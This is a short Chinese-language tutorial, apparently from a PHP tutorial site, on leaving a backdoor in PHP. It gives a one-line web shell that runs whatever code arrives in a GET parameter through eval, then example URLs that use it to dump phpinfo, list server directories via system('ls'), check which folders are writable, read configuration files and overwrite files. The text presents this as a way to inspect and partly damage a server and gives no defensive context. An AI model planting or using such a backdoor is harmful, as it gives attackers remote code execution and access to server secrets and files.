今天我們說一些最常見的PHP留後門的一些用法
#首先,寫一個最簡單的後門,也可以叫木馬。
<?php eval($_GET['evl']);
就這樣,你已經獲得了這台伺服器上的許多執行權限。
那場景的用法有哪些呢?
列印伺服器phpinfo
http://www.test.com/a.php?evl=phpinfo()
查看某個目錄下有什麼檔案
http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));查看目錄是否可寫,接下裡就可以在可寫的目錄裡建立可執行檔了
http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));取得某個檔案的內容,一般用來讀取設定
http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));對某個可寫目錄進行寫檔
http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));好了,以上基本上已經可以完成對一個伺服器的查看的部分破壞了,其他的功能就試著舉一反三吧。
以上是PHP後門的一些用法的詳細內容。更多資訊請關注PHP中文網其他相關文章!
